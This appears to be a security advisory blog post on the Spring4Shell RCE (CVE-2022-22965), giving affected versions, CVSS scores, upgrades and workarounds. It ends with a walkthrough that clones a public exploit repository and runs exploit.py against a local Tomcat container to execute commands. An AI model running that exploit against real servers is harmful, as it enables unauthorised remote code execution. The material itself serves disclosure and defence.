Dec 23, 2022
Data binding could make a Spring MVC or Spring WebFlux application running on JDK 9+ susceptible to remote code execution (RCE). To use the specified exploit, the application must be deployed as a WAR on Tomcat. The programme is not exposed to the vulnerability if it is deployed as a Spring Boot executable jar, which is the default. However, the vulnerability's nature is more generic, so there might be other ways to take advantage of it.
This vulnerability allowed unauthenticated and remote attackers to execute arbitrary code in the following products:
Identity Server Analytics
Identity Server as Key Manager
March 30, 2022
This vulnerability can lead to Remote Code Execution (RCE)
The following mitigation should be used by users of the impacted versions: Users of 5.3.x should update to 5.3.18+, while users of 5.2.x should update to 5.2.20+. Other actions are not required. For programmes that can't be upgraded to the aforementioned versions, there are various mitigation measures. These are discussed in the blog entry on the early announcement, which is located under the Resources heading. The following releases have addressed this problem:
Affected VMware Products and Versions
Severity is critical unless otherwise noted.
○ 5.3.0 to 5.3.17
○ 5.2.0 to 5.2.19
○ Older, unsupported versions are also affected
CVSS v3 Score Breakdown
Red Hat NVD
CVSS v3 Base Score 8.1 9.8
Attack Vector Network Network
Attack Complexity High Low
Privileges Required None None
User Interaction None None
Scope Unchanged Unchanged
Confidentiality High High
Integrity Impact High High
Availability Impact High High
Update to Spring Framework 5.3.18 and 5.2.20 or higher is the suggested course of action. Workarounds are not required if this has already been accomplished. Some people, however, might be in a situation where upgrading swiftly is not an option. We have included a few workarounds below as a result.
Downgrading to Java 8
Please note that workarounds are not necessarily mutually exclusive since security is best done “in depth”
Upgrading to Apache Tomcat 10.0.20, 9.0.62, or 8.5.78 offers sufficient security for older applications running on Tomcat with an unsupported Spring Framework version. To upgrade to a version of the Spring Framework that is currently supported as soon as possible, nevertheless, should be the major priority. If you choose to use this strategy, you ought to think about setting Disallowed Fields as well for defence in depth.
Downgrading to Java 8
If you are unable to upgrade Apache Tomcat or the Spring Framework, you can downgrade to Java 8 as a workaround.
Technical Analysis / Exploits:
1. For starting mitigation, first you need to download a vulnerable exploit
script from gitlab. Use the below command to download complete repositories
in your local system:
``` git clone https://github.com/devengpk/CVE-2022-22965.git ```
2. Then after downloading complete repositories, use the below command to
change your directory to the exploit repository:
``` cd CVE-2022-22965 ```
3. After changing the directory, let's start the docker container of tomcat
server using the below command.
``` docker build . -t spring4shell && docker run -p 80:8080 spring4shell ```
4. Verify if docker is successfully running using below command.
``` docker ps ```
5. Now, lets use python script to exploit tomcat server using below command
``` python3 exploit.py --url 'http://localhost/helloworld/greeting' ```
6. Output of above command shows exploitable URL, paste this URL is browser.
Pasting URL in browser, we found result of our command id
7. We got our RCE, now paste your desired command in the URL and it’ll work.
● https://github.com/devengpk/CVE-2022-22965 ● https://nvd.nist.gov/vuln/detail/cve-2022-22965
Spring MVC or Spring WebFlux application running on JDK 9+ susceptible to remote code execution (RCE).
Microsoft Windows Contacts (VCF/Contact/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day)j00sean (https://twitter.com/j00sean) July 11, 2023
CVE-2021-38294: Apache Storm Nimbus Command InjectionZeyad Abdelazim June 20, 2023
CVE-2023-21931 & CVE-2023-21839 RCE via post-deserializationMohammad Hussam Alzeyyat June 19, 2023
Have you missed them? The new reports feature is here!Noa Machter May 14, 2023
CVE-2021-45456 Apache Kylin RCE ExploitMohammad Hussam Alzeyyat April 30, 2023